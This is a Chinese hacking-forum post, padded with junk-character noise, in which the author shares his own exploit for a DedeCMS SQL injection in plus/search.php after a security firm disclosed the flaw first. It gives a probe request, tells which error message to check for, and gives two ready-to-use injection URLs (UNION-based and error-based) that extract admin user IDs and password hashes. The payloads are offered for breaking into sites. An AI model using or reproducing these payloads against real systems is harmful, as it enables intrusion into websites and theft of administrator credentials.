转载不加作者名的没JJ# H' Z8 z+ G: b- u, p7 J1 O
# d! @3 }0 R0 k& c* p# e$ a% a哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
' s7 n3 d& i! y/ {
" x- V& v# \% `& x! X既然已经发出来了,我就把我自己搞的exp发下吧。。唉。! G6 X, Y0 P4 Y c: p& C
! x& {+ c% a' p: \我一般是这样测试的:
" P0 n! U) l, L( ^* c3 O/ s
7 [, Q* ^, O' L' x! o# t, T提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
5 `4 h' u( I# p
, W" @9 h9 ^7 S) g0 s" A$ C% Q转载不加作者名的没JJ3 X# `6 N) N% j% R3 n/ E' \! u) b* b
% c. l) b5 ]0 f! O# L, @* y
作者:鬼哥
% ]1 U+ v& ^2 k0 _ U! P& O: k: I L! G2 @ F& J M2 F
( z5 ~9 f& |. |& H
& P: M Q1 q- P+ L ]看结果如果提示
8 B3 i/ b/ a9 z# r1 d1 @! J% m: Z: V5 c/ ]$ H& S4 a! p# [; @8 V+ A, W
Safe Alert: Request Error step 2 !
. J: O4 I) z4 J7 R) x
9 {& H# z2 E: G. l3 u8 M那么直接用下面的exp
' S9 A( m6 }" ~2 X3 K! k6 S* ?, ?5 y; o# W+ M$ Q" h) f
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
' t! H0 n D0 Y* h. r. v* ]. c9 J7 q: S# c! A
( W% x0 D/ j4 m0 R2 C看结果如果提示+ W0 n, [$ y. Z% b0 ~
' F, |0 y9 y: _6 n+ c4 D h9 }( b' lSafe Alert: Request Error step 1 ! J) q3 Y8 p; C
* D2 u4 Y: x0 A) ]
那么直接用下面的exp" m* F e: O4 e4 A
- R }+ y/ Y6 n- f' Y0 dxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a, v6 W) s9 N9 T% R r
) j" n/ a5 d3 Y
9 F5 v2 C; g# F8 O2 O9 L如果正常显示证明漏洞不存在了。4 |, w1 |! M# ~" k/ j$ H" g5 U
# J4 O6 u. F m: v( B
转载不加作者名的没JJ |